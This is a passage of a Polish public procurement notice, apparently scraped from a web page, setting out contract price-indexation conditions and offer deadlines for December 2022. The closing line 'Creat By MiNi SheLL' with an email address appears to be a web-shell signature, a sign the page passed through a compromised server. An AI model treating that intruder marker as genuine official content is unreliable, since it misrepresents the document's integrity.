zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub ubezpieczenie zdrowotne w stosunku do zasad obowiązujących w terminie składania oferty,<br/>d) zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (Dz. U. z 2020 r. poz. 1342) w stosunku do zasad obowiązujących w terminie składania oferty,<br/>e) zmiany cen materiałów lub kosztów związanych z realizacją zamówienia na poziomie wynoszącym co najmniej 3% w stosunku do cen materiałów lub kosztów obowiązujących w terminie składania oferty, przy czym za początkowy termin ustalania zmiany ceny ustala się datę odległą o równe 12 miesięcy od daty zawarcia umowy. Każda kolejna waloryzacja jest dopuszczalna po upływie 12 miesięcy od daty poprzedniej waloryzacji. Maksymalna dopuszczalna wartość zmiany wynagrodzenia należnego Wykonawcy w całym okresie realizacji zamówienia wynosi 7 % kwoty określonej w ofercie (załącznik do umowy).<br/>2. Zmiany cen o których mowa w pkt. ust. 1 dopuszczalne są na następujących warunkach:<br/>a) ad lit. a) – w przypadku zmiany stawki podatku od towarów i usług stosownie do stawki ustalonej w przepisach prawa obowiązującego w okresie trwania umowy, pod warunkiem wskazania przez Wykonawcę, że zmiany te mają wpływ na koszty wykonania zamówienia wraz z pełnym uzasadnieniem i wskazaniem procentowego<br/>Inwestycja współfinansowana ze środków Rządowego Programu Polski Ład<br/>– Program Inwestycji Strategicznych.<br/>18<br/>wzrostu tych cen. Jednocześnie Zamawiającemu będzie przysługiwać prawo żądania dalszych wyjaśnień wraz z przedstawieniem dalszych dokumentów celem stwierdzenia dopuszczalności, zmiany cen jednostkowych;<br/>b) ad lit. b) – w przypadku zmiany wysokości minimalnego wynagrodzenia za pracę stosownie do stawki ustalonej w przepisach prawa obowiązującego w okresie trwania umowy, w przypadku zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne stosownie do zmiany ustalonej w przepisach prawa obowiązującego w okresie trwania umowy, pod warunkiem wskazania przez Wykonawcę, że zmiany te mają wpływ na koszty wykonania zamówienia wraz z pełnym uzasadnieniem i wskazaniem procentowego wzrostu tych cen. Jednocześnie Zamawiającemu będzie przysługiwać prawo żądania dalszych wyjaśnień wraz z przedstawieniem dalszych dokumentów celem stwierdzenia dopuszczalności, zmiany cen jednostkowych;<br/>c) ad lit. c) - szczegółowe informacje zawiera załącznik do SWZ wzór umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-14 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-14 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com